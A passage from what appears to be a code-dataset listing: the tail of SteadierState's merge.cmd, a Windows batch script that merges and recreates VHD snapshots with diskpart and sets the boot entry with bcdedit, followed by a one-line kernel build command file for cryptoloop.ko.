rem snapshot.vhd from startnet
rem 2) Merges the two files
rem 3) Deletes the old snapshot.vhd
rem 4) Creates a new empty snapshot.vhd -- no BCD work required.
rem
rem SETUP:
rem assumes we've booted to the onboard SRS Tools WinPE (X:)
rem assumes that \snapshot.vhd is on the same drive as WinPE's running (X: now, C: when rebooted to Win 7)
rem
rem if we got here, time to get to work: merge the files, delete the old snapshot, create a new one.
rem
echo.
echo Found base image and snapshot files. Merging files... (This can take a while,
echo and Diskpart will offer "100 percent" for progress information, BUT the wait
echo to finish merging the VHDs AFTER that "100 percent" message can be one to seven
echo minutes depending on disk speeds, memory, the volume of changes etc.)
:setup
rem
rem Delete automerge
rem
echo.
echo Deleting unneeded files
if exist mergesnaps.txt del mergesnaps.txt
:mergesnapshot
rem
rem Merge snapshot.vhd into image.vhd
rem
echo.
echo Merging snapshot.vhd into image.vhd
echo select vdisk file="%_phydrive%\snapshot.vhd" >mergesnaps.txt
echo merge vdisk depth=1 >>mergesnaps.txt
echo exit >>mergesnaps.txt
diskpart /s mergesnaps.txt
del mergesnaps.txt
:deletesnapshot
echo.
echo Deleting old snapshot...
del %_phydrive%\snapshot.vhd
:makesnapshot
rem
rem Make snapshot.vhd
rem
echo.
echo Making a new copy of snapshot.vhd
del makesnapshot.txt
echo create vdisk file="%_phydrive%\snapshot.vhd" parent="%_phydrive%\image.vhd" > makesnapshot.txt
echo exit >>makesnapshot.txt
diskpart /s makesnapshot.txt
del makesnapshot.txt
:bcdcheck
rem
rem What I'm about to do is to take the output of the "bcdedit"
rem command looking for the string "snapshot.vhd." If I find it,
rem I'm assuming that we already have a boot-from-VHD entry in the
rem BCD that tries to boot from [%_phydrive%]\snapshot.vhd, and in
rem that case, we simply set it as the default.
rem
echo.
echo Setting the snapshot.vhd BCD entry as default
for /f "delims=" %%a in ('bcdedit %_bcdstore% /enum /v') do (
for /f "tokens=1,2" %%b in ('echo %%a') do (
if %%b==identifier (
set _guid=%%c
bcdedit %_bcdstore% /enum !_guid! /v | find /c "snapshot.vhd" >%_actdrive%\temp.txt
set _total=
set /p _total= <%_actdrive%\temp.txt
del %_actdrive%\temp.txt 2>nul
if not !_total!==0 (
bcdedit %_bcdstore% /default !_guid!
goto :goodend
)
)
)
)
:goodend
rem
rem Success
rem
echo.
echo Complete. Image.vhd now contains the old snapshot's
echo information, and that information cannot be lost by a future
echo rollback. It's safe to reboot now.
set _mergerc=0
goto :end
:badend
rem
rem Something failed
rem
set _mergerc=99
goto :end
:end
rem
rem Final message before exiting merge.cmd
rem
echo.
echo This copy of SteadierState has been updated to work with
echo Windows 7, 8, 8.1 and 10. The source can be found at
echo https://github.com/7heMC/SteadierState
echo.
echo Exiting...
|
7heMC/SteadierState
|
merge.cmd
|
bat
|
mit
| 3,354 |
cmd_drivers/block/cryptoloop.ko := /home/radug/Android/cm/system/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-ld -EL -r --build-id -o drivers/block/cryptoloop.ko drivers/block/cryptoloop.o drivers/block/cryptoloop.mod.o
|
RaduG/2.6.29-RaKern-2x-Hero
|
drivers/block/.cryptoloop.ko.cmd
|
bat
|
gpl-2.0
| 234 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.